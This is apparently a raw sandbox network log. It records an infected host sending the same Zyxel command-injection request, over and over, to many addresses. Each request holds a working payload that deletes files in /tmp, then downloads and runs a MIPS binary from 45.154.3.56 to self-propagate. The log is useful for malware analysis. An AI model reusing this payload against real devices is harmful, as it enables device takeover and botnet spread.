                        Mar 12, 2024 08:50:22.991100073 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        46192.168.2.145348271.62.240.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991164923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        47192.168.2.143984490.68.25.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991229057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        48192.168.2.144830480.73.172.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991333961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        49192.168.2.145011888.154.120.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991370916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        50192.168.2.1443040176.205.125.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991461039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        51192.168.2.1436048206.170.220.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991545916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        52192.168.2.144586248.6.28.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991631031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        53192.168.2.1450054132.223.45.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991694927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        54192.168.2.1454458180.118.29.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991794109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        55192.168.2.144556280.255.26.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991879940 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        56192.168.2.1459504137.55.8.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.991966963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        57192.168.2.144051631.167.115.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992017984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        58192.168.2.1437520193.109.48.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992136955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        59192.168.2.145467283.249.155.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992189884 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        60192.168.2.1446630151.47.29.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992335081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        61192.168.2.1436122117.21.118.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992403984 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        62192.168.2.1445964135.251.53.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992484093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        63192.168.2.1452546150.54.180.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992517948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        64192.168.2.1455580115.86.76.61443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992593050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        65192.168.2.1444220172.203.21.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992683887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        66192.168.2.143706438.186.44.150443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992754936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        67192.168.2.1449266198.112.169.122443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992815971 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        68192.168.2.14499885.185.110.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992901087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        69192.168.2.145254024.2.213.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.992976904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        70192.168.2.145031613.52.1.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993050098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        71192.168.2.1443246210.227.95.25443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993150949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        72192.168.2.1449576212.37.133.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993226051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        73192.168.2.1435576146.239.199.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993268967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        74192.168.2.1452200175.110.19.69443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993338108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        75192.168.2.1448320163.21.126.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993451118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        76192.168.2.14537709.16.213.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993537903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        77192.168.2.1459088183.151.4.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993628979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        78192.168.2.1448526164.156.79.193443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993712902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        79192.168.2.144635079.119.66.167443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993837118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        80192.168.2.144229075.180.175.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993882895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        81192.168.2.1453726223.236.110.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.993972063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        82192.168.2.143280020.3.242.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994057894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        83192.168.2.1456936145.124.139.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994153976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        84192.168.2.1455658103.167.69.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994229078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        85192.168.2.144872814.73.7.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994332075 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        86192.168.2.145683488.61.229.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994429111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        87192.168.2.144423470.205.50.142443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994482040 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        88192.168.2.143460870.104.159.32443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994559050 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        89192.168.2.1452148106.94.199.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994671106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        90192.168.2.144760468.7.224.35443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994767904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        91192.168.2.144186476.245.70.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994842052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        92192.168.2.144603634.51.51.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994935989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        93192.168.2.143927899.201.47.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.994975090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        94192.168.2.1442190197.9.103.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995075941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        95192.168.2.1447374149.117.91.105443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995091915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        96192.168.2.1432852134.100.126.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995239019 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        97192.168.2.145187860.55.223.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995291948 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        98192.168.2.1435166116.71.22.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995393038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        99192.168.2.1438846199.5.56.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995492935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        100192.168.2.144335868.76.150.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995595932 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        101192.168.2.1440538164.7.134.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995666027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        102192.168.2.1450656126.163.73.56443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995759010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        103192.168.2.143768681.254.227.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995812893 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        104192.168.2.1441372142.119.94.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995887041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        105192.168.2.143998682.98.136.238443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.995985985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        106192.168.2.145158847.252.197.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996054888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        107192.168.2.1448418116.123.78.46443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996141911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        108192.168.2.145811872.243.198.174443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996262074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        109192.168.2.1444562119.129.253.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996279955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        110192.168.2.144583096.126.159.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996377945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        111192.168.2.1444922115.10.121.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996449947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        112192.168.2.1442468106.246.70.87443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996541023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        113192.168.2.1452296154.195.155.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996634007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        114192.168.2.144477019.76.122.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:22.996721983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        115192.168.2.1453466157.94.169.238443
                        TimestampBytes transferredDirectionData
